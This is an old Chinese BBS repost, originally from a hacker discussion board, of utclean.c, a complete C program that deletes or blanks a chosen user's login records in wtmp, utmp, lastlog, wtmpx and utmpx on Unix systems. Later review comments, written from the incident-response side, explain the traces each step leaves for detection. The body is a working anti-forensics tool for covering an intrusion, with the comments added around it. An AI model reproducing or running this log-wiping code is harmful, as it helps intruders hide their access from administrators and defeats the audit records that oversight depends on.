发信人: tcpip (俺的昵称改了), 信区: cnunix
标 题: [转载] 关于/var/adm/utmp(x),wtmp(x),lastlog (总结,即给
发信站: 哈工大紫丁香 (Sun Sep 26 14:55:57 1999), 转信
发信人: cpu (奔腾的心), 信区: Solaris
发信站: 华南网木棉站 (Thu Jun 25 14:26:35 1998), 转信
【 以下文字转载自 Hacker 讨论区 】
【 原文由 cpu 所发表 】
/*utclean.c - cleans wtmp/wtmpx/utmp/utmpx/lastlog*/
/*Usage: utclean <username> <fixthings?> [hostname]*/
/*Written by undrtaker (undtaker@xxx.xxxxxxx.xxx.xx) - drop me a line*/
/*cpu 稍事整理 */
/* hostname only affects wtmp/wtmpx (would u like it to utmp?) */
#include <fcntl.h>
#include <utmp.h>
#include <sys/types.h>
#include <unistd.h>
#include <lastlog.h>
#include <stdio.h>
#include <pwd.h>
#define LASTLOG /* we always clean wtmp/utmp. Lastlog and ?tmpx, up to u. */
/* #define WTMPX */
#ifdef WTMPX
#include <utmpx.h>
#endif
/*
 * main - entry point of utclean: edits the local login-accounting files so
 * that records belonging to one account no longer appear in them.
 *
 * argv[1]  account name; must resolve through getpwnam().
 * argv[2]  "fixthings" flag; only its first character is compared with 'y'.
 * argv[3]  optional hostname; sets onlyhost when present.
 *
 * Exits with 2 on a wrong argument count and 3 when the account is unknown.
 * Otherwise control falls off the end of main with no explicit return value.
 *
 * Files touched (all paths are hard-coded below): /var/adm/wtmp, /etc/utmp,
 * /var/adm/lastlog (when LASTLOG is defined), /var/adm/wtmpx and /etc/utmpx
 * (when WTMPX is defined), plus wtmp.tmp / wtmpx.tmp in the current working
 * directory.
 *
 * NOTE(review): read from the incident-response side, every step here only
 * modifies files on the local host. The comments below point out what each
 * step leaves behind (zero-filled slots, mode changes, child processes), which
 * is what file-integrity monitoring, process auditing and off-host copies of
 * login records would let an analyst notice.
 */
main(argc, argv)
int argc;
char *argv[];
{
#ifdef WTMPX
struct utmpx utx;
#endif
struct lastlog l;
/* 'done' is declared and initialised but never read in this function. */
int entries = 0, removed = 0, done = 0, size, onlyhost;
struct utmp ut;
struct passwd *p_passwd;
uid_t uid;
int fp = -1,fd = -1;
/* 'host' is only assigned when a fourth argument is given. */
char *username, *host;
/* Accept exactly two or three arguments after the program name. */
if ( (argc != 3) && (argc != 4) ) {
fprintf(stderr,
"usage: %s <username> <fixthings> [hostname]\n",argv[0]);
exit(2);
}
size = sizeof(ut);
username = argv[1];
/* The account must exist: its uid is used later as the lastlog index. */
if ((p_passwd = getpwnam(username)) == NULL) {
fprintf(stderr,
"%s doesn't exit in passwd file\n", username);
exit(3);
}
uid = p_passwd->pw_uid;
if (argc == 4) {
host = argv[3]; onlyhost=1;
} else
onlyhost = 0;
/*
 * --- wtmp: filtered copy into ./wtmp.tmp ---
 * The original file is only read here; the copy is created relative to the
 * current working directory. O_CREAT is passed without a mode argument, so
 * the permission bits of a newly created wtmp.tmp are unspecified, and there
 * is no O_TRUNC, so a pre-existing wtmp.tmp keeps any bytes beyond what is
 * written now.
 */
fp = open("/var/adm/wtmp", O_RDONLY);
fd = open("wtmp.tmp", O_WRONLY|O_CREAT);
/* On either open failure the other descriptor is closed (it may itself be -1). */
if (fp < 0) {
perror("wtmp"); close(fd);
} else if (fd < 0) {
perror("wtmp.tmp"); close(fp);
} else {
/*
 * Fixed-size record loop; it stops at the first short read, so a trailing
 * partial record is not copied. A record is written to the copy when the
 * first 8 bytes of ut_name differ from username, or whenever onlyhost is
 * set; as written, supplying a hostname therefore copies every record and
 * 'removed' stays 0. The write() result is not checked.
 */
while (read(fp, &ut, size) == size) {
if ((strncmp(ut.ut_name, username, 8))
|| (onlyhost ) )
write(fd, &ut, size);
else
removed++;
entries++;
}
printf("\nwtmp: %i entries removed (total: %i)",
removed, entries);
close(fp);
close(fd);
}
/*
 * --- utmp: edited in place ---
 * Matching records (first 8 bytes of ut_user equal to username) are
 * overwritten with zero bytes at their original offset; the file length and
 * the number of slots do not change.
 * NOTE(review): an all-zero slot between populated ones, together with a
 * changed modification time on the file, is the trace this leaves.
 */
entries = removed = 0;
size = sizeof(struct utmp);
fd = open("/etc/utmp", O_RDWR);
if (fd < 0) perror("utmp");
else {
while (read(fd, &ut, size) == size) {
if (!strncmp(ut.ut_user, username, 8)) {
removed++;
memset(&ut, 0, size);
/* Step back one record so the write lands on the slot just read. */
lseek(fd, -1*size, SEEK_CUR);
write(fd, &ut, size);
}
entries++;
}
close(fd);
printf("\nutmp: %i entries removed. (total: %i)",
removed, entries);
}
#ifdef LASTLOG
/*
 * --- lastlog: the account's own slot is rewritten ---
 * The slot is located at offset sizeof(struct lastlog) * uid. The results of
 * lseek/read/write are not checked, so "lastlog: fixed" is printed whenever
 * the open succeeded. ll_time is set to 0; each strncpy stores a single space
 * and pads the rest of its count with NUL bytes.
 * NOTE(review): the counts 8 and 16 are hard-coded - presumably the sizes of
 * ll_line and ll_host on the target system; confirm against <lastlog.h>.
 * NOTE(review): a slot with ll_time == 0 and a line/host that begin with one
 * space, for an account known to have logged in, is the trace this leaves.
 */
entries = removed = 0;
size = sizeof(struct lastlog);
fd = open("/var/adm/lastlog", O_RDWR);
if (fd < 0) perror("lastlog");
else {
lseek(fd, size * uid, SEEK_SET);
read(fd, &l, size);
l.ll_time = 0;
strncpy(l.ll_line, " ", 8);
strncpy(l.ll_host, " ", 16);
lseek(fd, size * uid, SEEK_SET);
write(fd, &l, size);
close(fd);
printf("\nlastlog: fixed");
}
#endif
#ifdef WTMPX
/*
 * --- wtmpx: filtered copy into ./wtmpx.tmp (compiled only with WTMPX) ---
 * Same copy scheme as for wtmp, with two differences visible here: the name
 * comparison covers strlen(username) bytes, i.e. it is a prefix match, and
 * when a hostname was given a record is kept unless ut_host contains that
 * hostname as a substring. The counters are reset before this loop only when
 * LASTLOG is also defined.
 */
size = sizeof(utx);
fp = open("/var/adm/wtmpx", O_RDONLY);
fd = open("wtmpx.tmp", O_WRONLY|O_CREAT);
if (fp < 0) { perror("wtmpx"); close(fd); }
else if (fd < 0) { perror("wtmpx.tmp"); close(fp); }
else {
while (read(fp,&utx,size)==size) {
if( (strncmp(utx.ut_name,username,strlen(username)))
|| (onlyhost && (!strstr(utx.ut_host,host))) )
write(fd,&utx,size);
else removed++;
entries++;
}
printf("\nwtmpx: %i entries removed (total: %i)",
removed, entries);
close(fp);
close(fd);
}
/*
 * --- utmpx: edited in place ---
 * Records whose ut_user starts with username are zero-filled at their
 * original offset, as in the utmp pass above.
 */
entries = removed = 0;
fd = open("/etc/utmpx", O_RDWR);
if (fd < 0) perror("utmpx");
else {
while (read(fd, &utx, size) == size) {
if (!strncmp(utx.ut_user, username, strlen(username))) {
removed++;
memset(&utx, 0, size);
lseek(fd, -1*size, SEEK_CUR);
write(fd, &utx, size);
}
entries++;
}
close(fd);
printf("\nutmpx: %i entries removed. (total: %i)",
removed, entries);
}
#endif
/*
 * --- "fixthings": install the filtered copies over the originals ---
 * argv[2] always exists here because argc was checked to be 3 or 4. This
 * branch is not guarded by WTMPX, so the wtmpx chmod/cp/rm steps run even
 * when no wtmpx.tmp was produced. No return value is checked. The sequence
 * makes the temp files and then /var/adm/wtmp and /var/adm/wtmpx mode 0666,
 * copies the temp files over them through system() (a shell is spawned for
 * each command; "ls" and "rm" are resolved through PATH), removes the temp
 * files, and finally sets /var/adm/wtmp to 0664 and /var/adm/wtmpx to 0000.
 * NOTE(review): the mode changes on the accounting files, the shell/cp/ls/rm
 * child processes and the transient wtmp.tmp / wtmpx.tmp files in the working
 * directory are the events process auditing and file-integrity monitoring
 * would record. When the flag is not 'y', the temp files are left in place.
 */
if(argv[2][0] == 'y'){
chmod("./wtmp.tmp", 0666);
chmod("./wtmpx.tmp", 0666);
printf("\n\nold wtmp log file:\n");
system("ls -la /var/adm/wtmp*");
chmod("/var/adm/wtmp", 0666);
chmod("/var/adm/wtmpx", 0666);
system("/bin/cp ./wtmp.tmp /var/adm/wtmp ; rm ./wtmp.tmp");
system("/bin/cp ./wtmpx.tmp /var/adm/wtmpx ; rm ./wtmpx.tmp");
chmod("/var/adm/wtmp", 0664);
chmod("/var/adm/wtmpx", 0000);
printf("\nnew wtmp log file:\n");
system("ls -la /var/adm/wtmp*");
printf("\nfixthings: done.");
}
printf("\n\n...that's it. peace man :)\n\n");
}
--
******************************************************
蓦然回首,老子已是高级战友 。。。 。。。
******************************************************
※ 修改:.trueip 于 Sep 26 14:59:33 修改本文.[FROM: dns.mtlab.hit.ed]
※ 来源:.华南网木棉站 bbs.gznet.edu.cn.[FROM: 202.101.248.6]
--
--
※ 转寄:.华南网木棉站 bbs.gznet.edu.cn.[FROM: dns.mtlab.hit.ed]
--
☆ 来源:.哈工大紫丁香 bbs.hit.edu.cn.[FROM: trueip.bbs@melon.gzn]